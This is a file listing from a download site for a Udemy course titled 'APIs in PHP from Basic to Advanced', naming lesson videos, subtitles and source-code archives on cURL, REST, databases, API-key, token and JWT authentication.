[Tutorialsplanet.NET] Udemy - APIs in PHP from Basic to Advanced

mp4   Hot:29   Size:1.42 GB   Created:2023-04-19 17:34:55   Update:2024-04-21 15:12:29  

File List

  • 0. Websites you may like/[Tutorialsplanet.NET].url 128 B
    01 - Introduction how to use the course and software installation/001 Introduction and welcome how to get the most out of the course.mp4 10.88 MB
    01 - Introduction how to use the course and software installation/001 Introduction and welcome how to get the most out of the course_en.vtt 1.4 KB
    01 - Introduction how to use the course and software installation/002 Install a package with a web server, PHP, a database server and phpMyAdmin.mp4 12.61 MB
    01 - Introduction how to use the course and software installation/002 Install a package with a web server, PHP, a database server and phpMyAdmin_en.vtt 1.45 KB
    01 - Introduction how to use the course and software installation/002 MAMP.url 53 B
    01 - Introduction how to use the course and software installation/002 XAMPP-Installers-and-Downloads.url 64 B
    01 - Introduction how to use the course and software installation/003 Composer.url 48 B
    01 - Introduction how to use the course and software installation/003 Install Composer manage third-party packages and autoload class files.mp4 4.15 MB
    01 - Introduction how to use the course and software installation/003 Install Composer manage third-party packages and autoload class files_en.vtt 864 B
    01 - Introduction how to use the course and software installation/[Tutorialsplanet.NET].url 128 B
    01 - Introduction how to use the course and software installation/external-links.txt 165 B
    02 - API basics what APIs are and how to use them/001 Random-User-Generator.url 46 B
    02 - API basics what APIs are and how to use them/001 What is an API.mp4 16.85 MB
    02 - API basics what APIs are and how to use them/001 What is an API_en.vtt 3.9 KB
    02 - API basics what APIs are and how to use them/002 Example-domain.url 44 B
    02 - API basics what APIs are and how to use them/002 Make an API call access an API from PHP.mp4 11.5 MB
    02 - API basics what APIs are and how to use them/002 Make an API call access an API from PHP_en.vtt 2.48 KB
    02 - API basics what APIs are and how to use them/002 PHP-file-get-contents.url 84 B
    02 - API basics what APIs are and how to use them/002 Source-code-020-020-Make-an-API-call-access-an-API-from-PHP.zip 230 B
    02 - API basics what APIs are and how to use them/003 Decode API results reading JSON in PHP.mp4 19.73 MB
    02 - API basics what APIs are and how to use them/003 Decode API results reading JSON in PHP_en.vtt 3.6 KB
    02 - API basics what APIs are and how to use them/003 JSON.org.url 45 B
    02 - API basics what APIs are and how to use them/003 PHP-json-decode.url 78 B
    02 - API basics what APIs are and how to use them/003 Source-code-020-030-Decode-API-results-reading-JSON-in-PHP.zip 279 B
    02 - API basics what APIs are and how to use them/004 Agify.io.url 41 B
    02 - API basics what APIs are and how to use them/004 Source-code-020-040-Use-API-data-in-a-web-application.zip 456 B
    02 - API basics what APIs are and how to use them/004 Use API data in a web application.mp4 13.76 MB
    02 - API basics what APIs are and how to use them/004 Use API data in a web application_en.vtt 3.25 KB
    02 - API basics what APIs are and how to use them/external-links.txt 341 B
    03 - HTTP basics requests, responses and using cURL/001 PHP-cURL.url 67 B
    03 - HTTP basics requests, responses and using cURL/001 PHP-configuration-setting-allow-url-fopen.url 102 B
    03 - HTTP basics requests, responses and using cURL/001 PHP-file-get-contents.url 84 B
    03 - HTTP basics requests, responses and using cURL/001 Source-code-030-010-Use-cURL-instead-of-file-get-contents-to-make-an-API-request.zip 330 B
    03 - HTTP basics requests, responses and using cURL/001 Use cURL instead of file_get_contents to make an API request.mp4 24.07 MB
    03 - HTTP basics requests, responses and using cURL/001 Use cURL instead of file_get_contents to make an API request_en.vtt 5.05 KB
    03 - HTTP basics requests, responses and using cURL/001 cURL.url 40 B
    03 - HTTP basics requests, responses and using cURL/002 GitHub-404-page.url 46 B
    03 - HTTP basics requests, responses and using cURL/002 List-of-HTTP-status-codes.url 79 B
    03 - HTTP basics requests, responses and using cURL/002 OpenWeather-API.url 54 B
    03 - HTTP basics requests, responses and using cURL/002 Response codes get the HTTP status code.mp4 27.83 MB
    03 - HTTP basics requests, responses and using cURL/002 Response codes get the HTTP status code_en.vtt 4.58 KB
    03 - HTTP basics requests, responses and using cURL/002 Source-code-030-020-Response-codes-get-the-HTTP-status-code.zip 385 B
    03 - HTTP basics requests, responses and using cURL/003 List-of-HTTP-header-fields.url 95 B
    03 - HTTP basics requests, responses and using cURL/003 Request headers add meta data about the request.mp4 22.12 MB
    03 - HTTP basics requests, responses and using cURL/003 Request headers add meta data about the request_en.vtt 3.14 KB
    03 - HTTP basics requests, responses and using cURL/003 Source-code-030-030-Request-headers-add-meta-data-about-the-request.zip 411 B
    03 - HTTP basics requests, responses and using cURL/003 Unsplash-API-documentation-public-authentication.url 80 B
    03 - HTTP basics requests, responses and using cURL/003 Unsplash.url 45 B
    03 - HTTP basics requests, responses and using cURL/004 List-of-HTTP-header-fields.url 96 B
    03 - HTTP basics requests, responses and using cURL/004 PHP-curl-getinfo.url 79 B
    03 - HTTP basics requests, responses and using cURL/004 Response headers read meta data about the response.mp4 21.48 MB
    03 - HTTP basics requests, responses and using cURL/004 Response headers read meta data about the response_en.vtt 2.24 KB
    03 - HTTP basics requests, responses and using cURL/004 Source-code-030-040-Response-headers-read-meta-data-about-the-response.zip 470 B
    03 - HTTP basics requests, responses and using cURL/005 Get all individual response headers in an array.mp4 22.58 MB
    03 - HTTP basics requests, responses and using cURL/005 Get all individual response headers in an array_en.vtt 3.64 KB
    03 - HTTP basics requests, responses and using cURL/005 PHP-curl-setopt.url 78 B
    03 - HTTP basics requests, responses and using cURL/005 Source-code-030-050-Get-all-individual-response-headers-in-an-array.zip 567 B
    03 - HTTP basics requests, responses and using cURL/006 GitHub-API-reference-starring-a-repository.url 83 B
    03 - HTTP basics requests, responses and using cURL/006 GitHub-access-tokens.url 58 B
    03 - HTTP basics requests, responses and using cURL/006 GitHub-resources-in-the-REST-API.url 110 B
    03 - HTTP basics requests, responses and using cURL/006 HTTPie-GitHub-repository.url 56 B
    03 - HTTP basics requests, responses and using cURL/006 Source-code-030-060-Use-an-API-that-requires-a-specific-request-header.zip 440 B
    03 - HTTP basics requests, responses and using cURL/006 Use an API that requires a specific request header.mp4 19.91 MB
    03 - HTTP basics requests, responses and using cURL/006 Use an API that requires a specific request header_en.vtt 2.71 KB
    03 - HTTP basics requests, responses and using cURL/007 GitHub-activity-starring-a-repository.url 133 B
    03 - HTTP basics requests, responses and using cURL/007 HTTP-request-methods.url 97 B
    03 - HTTP basics requests, responses and using cURL/007 HTTPie-GitHub-repository.url 56 B
    03 - HTTP basics requests, responses and using cURL/007 Request method change the method to get a different result with the same URL.mp4 23.42 MB
    03 - HTTP basics requests, responses and using cURL/007 Request method change the method to get a different result with the same URL_en.vtt 3.35 KB
    03 - HTTP basics requests, responses and using cURL/007 Source-code-030-070-Request-method-change-the-method-to-get-a-different-result-with-the-same-URL.zip 440 B
    03 - HTTP basics requests, responses and using cURL/007 The-HTML-form-element.url 86 B
    03 - HTTP basics requests, responses and using cURL/008 GitHub-API-creating-a-repository.url 118 B
    03 - HTTP basics requests, responses and using cURL/008 Request body add a payload to send data along with the request.mp4 20.92 MB
    03 - HTTP basics requests, responses and using cURL/008 Request body add a payload to send data along with the request_en.vtt 2.93 KB
    03 - HTTP basics requests, responses and using cURL/008 Source-code-030-080-Request-body-add-a-payload-to-send-data-along-with-the-request.zip 515 B
    03 - HTTP basics requests, responses and using cURL/external-links.txt 1.91 KB
    04 - REST and RESTful APIs using them from PHP/001 REST and RESTful APIs what are they.mp4 16.37 MB
    04 - REST and RESTful APIs using them from PHP/001 REST and RESTful APIs what are they_en.vtt 3.49 KB
    04 - REST and RESTful APIs using them from PHP/001 REpresentational-State-Transfer.url 85 B
    04 - REST and RESTful APIs using them from PHP/001 The-REST-architectural-style.url 95 B
    04 - REST and RESTful APIs using them from PHP/002 Access a RESTful API in PHP with cURL.mp4 22.54 MB
    04 - REST and RESTful APIs using them from PHP/002 Access a RESTful API in PHP with cURL_en.vtt 3.17 KB
    04 - REST and RESTful APIs using them from PHP/002 GitHub-API-gists.url 71 B
    04 - REST and RESTful APIs using them from PHP/002 Source-code-040-020-Access-a-restful-API-in-PHP-with-cURL.zip 435 B
    04 - REST and RESTful APIs using them from PHP/003 Guzzle-PHP-HTTP-client.url 51 B
    04 - REST and RESTful APIs using them from PHP/003 Guzzle-documentation.url 61 B
    04 - REST and RESTful APIs using them from PHP/003 PHP-cURL.url 67 B
    04 - REST and RESTful APIs using them from PHP/003 PHP-file-get-contents.url 84 B
    04 - REST and RESTful APIs using them from PHP/003 Source-code-040-030-Use-the-Guzzle-HTTP-client-for-object-oriented-API-code.zip 3.11 KB
    04 - REST and RESTful APIs using them from PHP/003 Use the Guzzle HTTP client for object-oriented API code.mp4 25.45 MB
    04 - REST and RESTful APIs using them from PHP/003 Use the Guzzle HTTP client for object-oriented API code_en.vtt 4.58 KB
    04 - REST and RESTful APIs using them from PHP/004 Amazon-PHP-SDK.url 59 B
    04 - REST and RESTful APIs using them from PHP/004 Guzzle-PHP-HTTP-client.url 51 B
    04 - REST and RESTful APIs using them from PHP/004 PHP-SDK-search.url 65 B
    04 - REST and RESTful APIs using them from PHP/004 PHP-http-build-query.url 83 B
    04 - REST and RESTful APIs using them from PHP/004 Source-code-040-040-Use-an-SDK-compare-the-Stripe-API-to-its-SDK.zip 1.65 KB
    04 - REST and RESTful APIs using them from PHP/004 Stripe-API-libraries.url 79 B
    04 - REST and RESTful APIs using them from PHP/004 Stripe-API-reference.url 70 B
    04 - REST and RESTful APIs using them from PHP/004 Stripe-dashboard.url 53 B
    04 - REST and RESTful APIs using them from PHP/004 Stripe-payment-gateway.url 43 B
    04 - REST and RESTful APIs using them from PHP/004 Use an SDK compare the Stripe API to its SDK.mp4 29.27 MB
    04 - REST and RESTful APIs using them from PHP/004 Use an SDK compare the Stripe API to its SDK_en.vtt 4.82 KB
    04 - REST and RESTful APIs using them from PHP/external-links.txt 1.08 KB
    05 - Create a RESTful API build a framework for serving the API/001 Source-code-050-010-Start-writing-the-API-enable-URL-rewriting.zip 521 B
    05 - Create a RESTful API build a framework for serving the API/001 Start writing the API enable URL rewriting.mp4 7.97 MB
    05 - Create a RESTful API build a framework for serving the API/001 Start writing the API enable URL rewriting_en.vtt 3.15 KB
    05 - Create a RESTful API build a framework for serving the API/002 Source-code-050-020-The-front-controller-get-the-resource-ID-and-the-request-method.zip 643 B
    05 - Create a RESTful API build a framework for serving the API/002 The front controller get the resource, ID and the request method.mp4 10.27 MB
    05 - Create a RESTful API build a framework for serving the API/002 The front controller get the resource, ID and the request method_en.vtt 3.74 KB
    05 - Create a RESTful API build a framework for serving the API/003 HTTPie-API-testing-client.url 42 B
    05 - Create a RESTful API build a framework for serving the API/003 Postman-API-platform.url 48 B
    05 - Create a RESTful API build a framework for serving the API/003 Source-code-050-030-Use-a-client-for-API-development-cURL-Postman-or-HTTPie.zip 648 B
    05 - Create a RESTful API build a framework for serving the API/003 Use a client for API development cURL, Postman or HTTPie.mp4 14.28 MB
    05 - Create a RESTful API build a framework for serving the API/003 Use a client for API development cURL, Postman or HTTPie_en.vtt 3.06 KB
    05 - Create a RESTful API build a framework for serving the API/003 cURL.url 40 B
    05 - Create a RESTful API build a framework for serving the API/004 PHP-header.url 73 B
    05 - Create a RESTful API build a framework for serving the API/004 PHP-http-response-code.url 85 B
    05 - Create a RESTful API build a framework for serving the API/004 Set the HTTP status code best practices.mp4 16.64 MB
    05 - Create a RESTful API build a framework for serving the API/004 Set the HTTP status code best practices_en.vtt 3.75 KB
    05 - Create a RESTful API build a framework for serving the API/004 Source-code-050-040-Set-the-HTTP-status-code-best-practices.zip 734 B
    05 - Create a RESTful API build a framework for serving the API/005 Add a controller class to decide the response.mp4 16.06 MB
    05 - Create a RESTful API build a framework for serving the API/005 Add a controller class to decide the response_en.vtt 4.24 KB
    05 - Create a RESTful API build a framework for serving the API/005 Source-code-050-050-Add-a-controller-class-to-decide-the-response.zip 1.27 KB
    05 - Create a RESTful API build a framework for serving the API/006 Autoloading-with-Composer.url 81 B
    05 - Create a RESTful API build a framework for serving the API/006 PHP-spl-autoload-register.url 88 B
    05 - Create a RESTful API build a framework for serving the API/006 Source-code-050-060-Use-Composers-autoloader-to-load-classes-automatically.zip 1.42 KB
    05 - Create a RESTful API build a framework for serving the API/006 Use Composer's autoloader to load classes automatically.mp4 11.62 MB
    05 - Create a RESTful API build a framework for serving the API/006 Use Composer's autoloader to load classes automatically_en.vtt 2.43 KB
    05 - Create a RESTful API build a framework for serving the API/007 Make debugging easier add type declarations and enable strict type checking.mp4 17.44 MB
    05 - Create a RESTful API build a framework for serving the API/007 Make debugging easier add type declarations and enable strict type checking_en.vtt 2.89 KB
    05 - Create a RESTful API build a framework for serving the API/007 PHP-Type-declarations.url 85 B
    05 - Create a RESTful API build a framework for serving the API/007 PHP-configuration-setting-display-errors.url 100 B
    05 - Create a RESTful API build a framework for serving the API/007 Source-code-050-070-Make-debugging-easier-add-type-declarations-and-enable-strict-type-checking.zip 0 B
    05 - Create a RESTful API build a framework for serving the API/008 Always return JSON add a generic exception handler and JSON Content-Type header.mp4 25.01 MB
    05 - Create a RESTful API build a framework for serving the API/008 Always return JSON add a generic exception handler and JSON Content-Type header_en.vtt 5.23 KB
    05 - Create a RESTful API build a framework for serving the API/008 PHP-Throwable-class.url 73 B
    05 - Create a RESTful API build a framework for serving the API/008 PHP-set-exception-handler.url 88 B
    05 - Create a RESTful API build a framework for serving the API/008 Source-code-050-080-Always-return-JSON-add-a-generic-exception-handler-and-JSON-Content-Type-header.zip 0 B
    05 - Create a RESTful API build a framework for serving the API/009 405-status-code-Method-not-allowed.url 84 B
    05 - Create a RESTful API build a framework for serving the API/009 HTTP-Allow-header.url 87 B
    05 - Create a RESTful API build a framework for serving the API/009 Send a 405 status code and Allow header for invalid request methods.mp4 19.29 MB
    05 - Create a RESTful API build a framework for serving the API/009 Send a 405 status code and Allow header for invalid request methods_en.vtt 3.97 KB
    05 - Create a RESTful API build a framework for serving the API/009 Source-code-050-090-Send-a-405-status-code-and-Allow-header-for-invalid-request-methods.zip 1.95 KB
    05 - Create a RESTful API build a framework for serving the API/[Tutorialsplanet.NET].url 128 B
    05 - Create a RESTful API build a framework for serving the API/external-links.txt 1.05 KB
    06 - Create a RESTful API create a database and retrieve data from it/001 Create a new database and a database user to access it.mp4 6.95 MB
    06 - Create a RESTful API create a database and retrieve data from it/001 Create a new database and a database user to access it_en.vtt 2.11 KB
    06 - Create a RESTful API create a database and retrieve data from it/001 Source-code-060-010-Create-a-new-database-and-a-database-user-to-access-it.zip 280 B
    06 - Create a RESTful API create a database and retrieve data from it/002 Create a table to store resource data.mp4 4.62 MB
    06 - Create a RESTful API create a database and retrieve data from it/002 Create a table to store resource data_en.vtt 1.35 KB
    06 - Create a RESTful API create a database and retrieve data from it/002 Source-code-060-020-Create-a-table-to-store-resource-data.zip 329 B
    06 - Create a RESTful API create a database and retrieve data from it/003 Connect to the database from PHP add a Database class.mp4 18.4 MB
    06 - Create a RESTful API create a database and retrieve data from it/003 Connect to the database from PHP add a Database class_en.vtt 3.99 KB
    06 - Create a RESTful API create a database and retrieve data from it/003 PHP-constructor-promotion.url 119 B
    06 - Create a RESTful API create a database and retrieve data from it/003 Source-code-060-030-Connect-to-the-database-from-PHP-add-a-Database-class.zip 2.39 KB
    06 - Create a RESTful API create a database and retrieve data from it/004 Move the database connection data to a separate .env file.mp4 18.25 MB
    06 - Create a RESTful API create a database and retrieve data from it/004 Move the database connection data to a separate .env file_en.vtt 3.5 KB
    06 - Create a RESTful API create a database and retrieve data from it/004 Packagist-dotenv-packages.url 59 B
    06 - Create a RESTful API create a database and retrieve data from it/004 Source-code-060-035-Move-the-database-connection-data-to-a-separate-env-file.zip 4.89 KB
    06 - Create a RESTful API create a database and retrieve data from it/005 Create a table data gateway class for the resource table.mp4 13.73 MB
    06 - Create a RESTful API create a database and retrieve data from it/005 Create a table data gateway class for the resource table_en.vtt 3.51 KB
    06 - Create a RESTful API create a database and retrieve data from it/005 Source-code-060-040-Create-a-table-data-gateway-class-for-the-resource-table.zip 5.21 KB
    06 - Create a RESTful API create a database and retrieve data from it/006 Show a list of all records.mp4 13.36 MB
    06 - Create a RESTful API create a database and retrieve data from it/006 Show a list of all records_en.vtt 3.17 KB
    06 - Create a RESTful API create a database and retrieve data from it/006 Source-code-060-050-Show-a-list-of-all-records.zip 5.32 KB
    06 - Create a RESTful API create a database and retrieve data from it/007 Configure PDO to prevent numeric values from being converted to strings.mp4 15.47 MB
    06 - Create a RESTful API create a database and retrieve data from it/007 Configure PDO to prevent numeric values from being converted to strings_en.vtt 2.52 KB
    06 - Create a RESTful API create a database and retrieve data from it/007 JSON.org.url 57 B
    06 - Create a RESTful API create a database and retrieve data from it/007 PDO-setAttribute.url 74 B
    06 - Create a RESTful API create a database and retrieve data from it/007 Source-code-060-055-Configure-PDO-to-prevent-numeric-values-from-being-converted-to-strings.zip 0 B
    06 - Create a RESTful API create a database and retrieve data from it/008 BOOLEAN-values-in-MySQL-MariaDB.url 58 B
    06 - Create a RESTful API create a database and retrieve data from it/008 Convert database booleans to boolean literals in the JSON.mp4 10.31 MB
    06 - Create a RESTful API create a database and retrieve data from it/008 Convert database booleans to boolean literals in the JSON_en.vtt 2.33 KB
    06 - Create a RESTful API create a database and retrieve data from it/008 JSON.org.url 57 B
    06 - Create a RESTful API create a database and retrieve data from it/008 Source-code-060-057-Convert-database-booleans-to-boolean-literals-in-the-JSON.zip 5.43 KB
    06 - Create a RESTful API create a database and retrieve data from it/009 PDOStatement-fetch.url 76 B
    06 - Create a RESTful API create a database and retrieve data from it/009 Show an individual record.mp4 12.87 MB
    06 - Create a RESTful API create a database and retrieve data from it/009 Show an individual record_en.vtt 2.59 KB
    06 - Create a RESTful API create a database and retrieve data from it/009 Source-code-060-060-Show-an-individual-record.zip 5.53 KB
    06 - Create a RESTful API create a database and retrieve data from it/010 Respond with 404 if the resource with the specified ID is not found.mp4 15.71 MB
    06 - Create a RESTful API create a database and retrieve data from it/010 Respond with 404 if the resource with the specified ID is not found_en.vtt 3.86 KB
    06 - Create a RESTful API create a database and retrieve data from it/010 Source-code-060-070-Respond-with-404-if-the-resource-with-the-specified-ID-is-not-found.zip 0 B
    06 - Create a RESTful API create a database and retrieve data from it/external-links.txt 533 B
    07 - Create a RESTful API create, update and delete individual resources/001 Get the data from the request as JSON.mp4 21.61 MB
    07 - Create a RESTful API create, update and delete individual resources/001 Get the data from the request as JSON_en.vtt 4.87 KB
    07 - Create a RESTful API create, update and delete individual resources/001 HTTPie-default-behaviour.url 64 B
    07 - Create a RESTful API create, update and delete individual resources/001 HTTPie-request-items.url 60 B
    07 - Create a RESTful API create, update and delete individual resources/001 PHP-POST.url 81 B
    07 - Create a RESTful API create, update and delete individual resources/001 PHP-input-stream-wrappers.url 89 B
    07 - Create a RESTful API create, update and delete individual resources/001 Source-code-070-010-Get-the-data-from-the-request-as-JSON.zip 5.66 KB
    07 - Create a RESTful API create, update and delete individual resources/002 HTTP-201-Created-status-code.url 84 B
    07 - Create a RESTful API create, update and delete individual resources/002 Insert a record into the database and respond with a 201 status code.mp4 22.45 MB
    07 - Create a RESTful API create, update and delete individual resources/002 Insert a record into the database and respond with a 201 status code_en.vtt 4.29 KB
    07 - Create a RESTful API create, update and delete individual resources/002 Source-code-070-020-Insert-a-record-into-the-database-and-respond-with-a-201-status-code.zip 0 B
    07 - Create a RESTful API create, update and delete individual resources/003 Add a generic error handler to output warnings as JSON.mp4 19.02 MB
    07 - Create a RESTful API create, update and delete individual resources/003 Add a generic error handler to output warnings as JSON_en.vtt 2.87 KB
    07 - Create a RESTful API create, update and delete individual resources/003 PHP-Error-class.url 69 B
    07 - Create a RESTful API create, update and delete individual resources/003 PHP-ErrorException-class.url 78 B
    07 - Create a RESTful API create, update and delete individual resources/003 PHP-set-exception-handler.url 88 B
    07 - Create a RESTful API create, update and delete individual resources/003 Source-code-070-025-Add-a-generic-error-handler-to-output-warnings-as-JSON.zip 5.93 KB
    07 - Create a RESTful API create, update and delete individual resources/004 HTTP-status-code-422-unprocessable-entity.url 84 B
    07 - Create a RESTful API create, update and delete individual resources/004 Source-code-070-030-Validate-the-data-and-respond-with-a-422-status-code-if-invalid.zip 0 B
    07 - Create a RESTful API create, update and delete individual resources/004 Validate the data and respond with a 422 status code if invalid.mp4 21.13 MB
    07 - Create a RESTful API create, update and delete individual resources/004 Validate the data and respond with a 422 status code if invalid_en.vtt 4.25 KB
    07 - Create a RESTful API create, update and delete individual resources/005 Conditionally validate the data when updating an existing record.mp4 16.17 MB
    07 - Create a RESTful API create, update and delete individual resources/005 Conditionally validate the data when updating an existing record_en.vtt 3.06 KB
    07 - Create a RESTful API create, update and delete individual resources/005 Source-code-070-040-Conditionally-validate-the-data-when-updating-an-existing-record.zip 0 B
    07 - Create a RESTful API create, update and delete individual resources/006 Get the data from the request for updating an existing record.mp4 19.7 MB
    07 - Create a RESTful API create, update and delete individual resources/006 Get the data from the request for updating an existing record_en.vtt 4.3 KB
    07 - Create a RESTful API create, update and delete individual resources/006 Source-code-070-050-Get-the-data-from-the-request-for-updating-an-existing-record.zip 6.33 KB
    07 - Create a RESTful API create, update and delete individual resources/007 Source-code-070-060-Update-the-record-in-the-database-and-return-a-200-status-code.zip 0 B
    07 - Create a RESTful API create, update and delete individual resources/007 Update the record in the database and return a 200 status code.mp4 22.38 MB
    07 - Create a RESTful API create, update and delete individual resources/007 Update the record in the database and return a 200 status code_en.vtt 5.44 KB
    07 - Create a RESTful API create, update and delete individual resources/008 Delete the record in the database and return a 200 status code.mp4 10.59 MB
    07 - Create a RESTful API create, update and delete individual resources/008 Delete the record in the database and return a 200 status code_en.vtt 2.22 KB
    07 - Create a RESTful API create, update and delete individual resources/008 Source-code-070-070-Delete-the-record-in-the-database-and-return-a-200-status-code.zip 0 B
    07 - Create a RESTful API create, update and delete individual resources/external-links.txt 781 B
    08 - API key authentication/001 Create a table to store user account data.mp4 14.56 MB
    08 - API key authentication/001 Create a table to store user account data_en.vtt 3.45 KB
    08 - API key authentication/001 GitHub-REST-API-resources.url 90 B
    08 - API key authentication/001 PHP-password-hash.url 80 B
    08 - API key authentication/001 Random-User-Generator.url 46 B
    08 - API key authentication/001 Source-code-080-010-Create-a-table-to-store-user-account-data.zip 326 B
    08 - API key authentication/002 Add a register page to insert a new user record and generate a new API key.mp4 30.56 MB
    08 - API key authentication/002 Add a register page to insert a new user record and generate a new API key_en.vtt 5.57 KB
    08 - API key authentication/002 PHP-bin2hex.url 74 B
    08 - API key authentication/002 PHP-random-bytes.url 79 B
    08 - API key authentication/002 Pico-CSS-framework.url 44 B
    08 - API key authentication/002 Source-code-080-020-Add-a-register-page-to-insert-a-new-user-record-and-generate-a-new-API-key.zip 7.4 KB
    08 - API key authentication/003 API-key.url 91 B
    08 - API key authentication/003 PHP-SERVER.url 83 B
    08 - API key authentication/003 Send the API key with the request query string or request header.mp4 14.39 MB
    08 - API key authentication/003 Send the API key with the request query string or request header_en.vtt 2.69 KB
    08 - API key authentication/003 Source-code-080-030-Send-the-API-key-with-the-request-query-string-or-request-header.zip 7.43 KB
    08 - API key authentication/004 Check the API key is present in the request and return 400 if not.mp4 7.92 MB
    08 - API key authentication/004 Check the API key is present in the request and return 400 if not_en.vtt 1.67 KB
    08 - API key authentication/004 HTTP-status-code-400-Bad-request.url 84 B
    08 - API key authentication/004 Source-code-080-035-Check-the-API-key-is-present-in-the-request-and-return-400-if-not.zip 7.48 KB
    08 - API key authentication/005 Create a table data gateway class for the user table.mp4 11.63 MB
    08 - API key authentication/005 Create a table data gateway class for the user table_en.vtt 2.4 KB
    08 - API key authentication/005 Source-code-080-040-Create-a-table-data-gateway-class-for-the-user-table.zip 7.93 KB
    08 - API key authentication/006 Authenticate the API key and return a 401 status code if invalid.mp4 10.86 MB
    08 - API key authentication/006 Authenticate the API key and return a 401 status code if invalid_en.vtt 1.97 KB
    08 - API key authentication/006 HTTP-status-code-401-Unauthorized.url 84 B
    08 - API key authentication/006 Source-code-080-050-Authenticate-the-API-key-and-return-a-401-status-code-if-invalid.zip 7.96 KB
    08 - API key authentication/007 Refactor the front controller to a bootstrap file and Auth class.mp4 23.65 MB
    08 - API key authentication/007 Refactor the front controller to a bootstrap file and Auth class_en.vtt 4.59 KB
    08 - API key authentication/007 Source-code-080-060-Refactor-the-front-controller-to-a-bootstrap-file-and-Auth-class.zip 8.51 KB
    08 - API key authentication/008 Add a foreign key relationship to link task records to user records.mp4 6.02 MB
    08 - API key authentication/008 Add a foreign key relationship to link task records to user records_en.vtt 1.92 KB
    08 - API key authentication/008 Source-code-080-080-Add-a-foreign-key-relationship-to-link-task-records-to-user-records.zip 295 B
    08 - API key authentication/009 Retrieve the ID of the authenticated user when authenticating.mp4 10.2 MB
    08 - API key authentication/009 Retrieve the ID of the authenticated user when authenticating_en.vtt 2.04 KB
    08 - API key authentication/009 Source-code-080-090-Retrieve-the-ID-of-the-authenticated-user-when-authenticating.zip 8.59 KB
    08 - API key authentication/010 Restrict the tasks index endpoint to only show the authenticated user's tasks.mp4 12.01 MB
    08 - API key authentication/010 Restrict the tasks index endpoint to only show the authenticated user's tasks_en.vtt 2.4 KB
    08 - API key authentication/010 Source-code-080-100-Restrict-the-tasks-index-endpoint-to-only-show-the-authenticated-users-tasks.zip 8.61 KB
    08 - API key authentication/011 Restrict the rest of the task endpoints to the authenticated user's tasks.mp4 21.91 MB
    08 - API key authentication/011 Restrict the rest of the task endpoints to the authenticated user's tasks_en.vtt 4.03 KB
    08 - API key authentication/011 Source-code-080-110-Restrict-the-rest-of-the-task-endpoints-to-the-authenticated-users-tasks.zip 8.65 KB
    08 - API key authentication/012 Cache the database connection to avoid multiple connections in the same request.mp4 10.72 MB
    08 - API key authentication/012 Cache the database connection to avoid multiple connections in the same request_en.vtt 2.01 KB
    08 - API key authentication/012 Source-code-080-120-Cache-the-database-connection-to-avoid-multiple-connections-in-the-same-request.zip 8.69 KB
    08 - API key authentication/external-links.txt 805 B
    09 - An introduction to authentication using access tokens/001 An introduction to authentication using access tokens.mp4 8.43 MB
    09 - An introduction to authentication using access tokens/001 An introduction to authentication using access tokens_en.vtt 2.47 KB
    09 - An introduction to authentication using access tokens/002 Create the login script and return 400 if the username and password are missing.mp4 11.66 MB
    09 - An introduction to authentication using access tokens/002 Create the login script and return 400 if the username and password are missing_en.vtt 3.11 KB
    09 - An introduction to authentication using access tokens/002 Source-code-090-020-Create-the-login-script-and-return-400-if-the-username-and-password-are-missing.zip 0 B
    09 - An introduction to authentication using access tokens/003 Select the user record based on the username in the request.mp4 12.41 MB
    09 - An introduction to authentication using access tokens/003 Select the user record based on the username in the request_en.vtt 2.69 KB
    09 - An introduction to authentication using access tokens/003 Source-code-090-030-Select-the-user-record-based-on-the-username-in-the-request.zip 9.25 KB
    09 - An introduction to authentication using access tokens/004 Check the username and password and return a 401 status code if invalid.mp4 9.43 MB
    09 - An introduction to authentication using access tokens/004 Check the username and password and return a 401 status code if invalid_en.vtt 2.48 KB
    09 - An introduction to authentication using access tokens/004 Source-code-090-040-Check-the-username-and-password-and-return-a-401-status-code-if-invalid.zip 9.32 KB
    09 - An introduction to authentication using access tokens/005 Generate an encoded access token containing the user details.mp4 14.27 MB
    09 - An introduction to authentication using access tokens/005 Generate an encoded access token containing the user details_en.vtt 3.29 KB
    09 - An introduction to authentication using access tokens/005 PHP-base64-encode.url 80 B
    09 - An introduction to authentication using access tokens/005 Source-code-090-050-Generate-an-encoded-access-token-containing-the-user-details.zip 9.37 KB
    09 - An introduction to authentication using access tokens/006 HTTP-Authorization-header.url 95 B
    09 - An introduction to authentication using access tokens/006 PHP-apache-request-headers.url 89 B
    09 - An introduction to authentication using access tokens/006 Pass the access token to the task API endpoints in the authorization header.mp4 23.85 MB
    09 - An introduction to authentication using access tokens/006 Pass the access token to the task API endpoints in the authorization header_en.vtt 5.43 KB
    09 - An introduction to authentication using access tokens/006 Source-code-090-060-Pass-the-access-token-to-the-task-API-endpoints-in-the-authorization-header.zip 9.49 KB
    09 - An introduction to authentication using access tokens/007 Source-code-090-070-Validate-the-access-token-and-decode-its-contents.zip 9.61 KB
    09 - An introduction to authentication using access tokens/007 Validate the access token and decode its contents.mp4 24.14 MB
    09 - An introduction to authentication using access tokens/007 Validate the access token and decode its contents_en.vtt 5.57 KB
    09 - An introduction to authentication using access tokens/008 Get the authenticated user data from the access token.mp4 17.73 MB
    09 - An introduction to authentication using access tokens/008 Get the authenticated user data from the access token_en.vtt 4.16 KB
    09 - An introduction to authentication using access tokens/008 Source-code-090-080-Get-the-authenticated-user-data-from-the-access-token.zip 9.6 KB
    09 - An introduction to authentication using access tokens/[Tutorialsplanet.NET].url 128 B
    09 - An introduction to authentication using access tokens/external-links.txt 290 B
    10 - Authentication using JSON Web Tokens (JWTs)/001 An introduction to JSON web tokens (JWTs).mp4 11.93 MB
    10 - Authentication using JSON Web Tokens (JWTs)/001 An introduction to JSON web tokens (JWTs)_en.vtt 3.67 KB
    10 - Authentication using JSON Web Tokens (JWTs)/001 JSON-Web-Tokens.url 39 B
    10 - Authentication using JSON Web Tokens (JWTs)/002 Create a class to encode a payload in a JWT.mp4 23.97 MB
    10 - Authentication using JSON Web Tokens (JWTs)/002 Create a class to encode a payload in a JWT_en.vtt 4.96 KB
    10 - Authentication using JSON Web Tokens (JWTs)/002 HMAC-with-SHA-2-Functions.url 81 B
    10 - Authentication using JSON Web Tokens (JWTs)/002 PHP-JWT-package.url 59 B
    10 - Authentication using JSON Web Tokens (JWTs)/002 PHP-hash-hmac.url 76 B
    10 - Authentication using JSON Web Tokens (JWTs)/002 Search-256-bit-key-generator.url 79 B
    10 - Authentication using JSON Web Tokens (JWTs)/002 Source-code-100-020-Create-a-class-to-encode-a-payload-in-a-JWT.zip 10.09 KB
    10 - Authentication using JSON Web Tokens (JWTs)/002 base64-URL-encoding.url 81 B
